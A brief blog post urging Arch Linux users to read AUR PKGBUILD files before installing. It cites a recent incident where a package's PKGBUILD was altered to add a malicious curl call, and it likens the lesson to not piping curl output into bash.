Always read your PKGBUILDs →
If you don’t read the PKGBUILD file whenever you download something from the AUR repositories, you are exposing yourself to terrible security issues, as the world has recently seen.
Malware was spotted in the AUR repositories of Arch Linux last week. Someone modified the PKGBUILD of a package to add a curl call in the script file, as can be seen here (as long as they don’t purge the blob object from the repository, because they stripped out the commit from the history).
I would file this tip in the same category as “don’t just curl bash pipe stuff you find at GitHub”, but it’s getting late and I don’t have time for entering in the rabbit hole argument of where do we put the limit on trusting the software and the installers we put in our machines.